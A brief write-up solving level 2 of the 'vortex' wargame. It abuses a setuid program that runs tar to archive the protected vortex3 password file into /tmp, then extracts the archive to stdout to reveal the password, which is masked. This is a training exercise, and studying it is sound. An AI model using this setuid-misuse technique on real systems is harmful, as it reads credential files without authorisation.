Solution for level2:
Here is the code:
1
2
3
4
5
6
7
8
9
10
|
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
int main(int argc, char **argv)
{
char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] };
execv(args[0], args);
}
|
$$ expands to the process ID of the shell.
Let’s make some observations:
1
2
3
4
|
vortex2@melissa:~$ ls -l /etc/vortex_pass/vortex3
-r-------- 1 vortex3 vortex3 10 2011-11-14 18:15 /etc/vortex_pass/vortex3
vortex2@melissa:~$ ls -l /vortex/vortex2
-r-sr-x--- 1 vortex3 vortex2 7134 2011-11-13 23:07 /vortex/vortex2
|
The password file is owned by vortex3. And the binary /vortex/vortex3 is allowed to read this file. So we are allowed to tar this file using the binary. The binary itself expects 3 arguments. There we go:
1
2
3
4
5
6
7
8
|
vortex2@melissa:/etc/vortex_pass$ /vortex/vortex2 vortex3 vortex3 vortex3
/bin/tar: U\211\345WVS\350Z: Cannot stat: No such file or directory
/bin/tar: Exiting with failure status due to previous errors
vortex2@melissa:/etc/vortex_pass$ ls -l '/tmp/ownership.$$.tar'
-rw-r--r-- 1 vortex3 vortex2 10240 2012-10-31 18:59 /tmp/ownership.$$.tar
vortex2@melissa:/etc/vortex_pass$ cd /tmp/****
vortex2@melissa:/tmp/****$ cp '/tmp/ownership.$$.tar' .
cp: cannot create regular file `./ownership.$$.tar': Permission denied
|
Obviously we are not allowed to copy/untar the file. What about STDOUT?
1
2
|
$ tar xf '/tmp/ownership.$$.tar' -O
*******
|
Password revealed. Next level!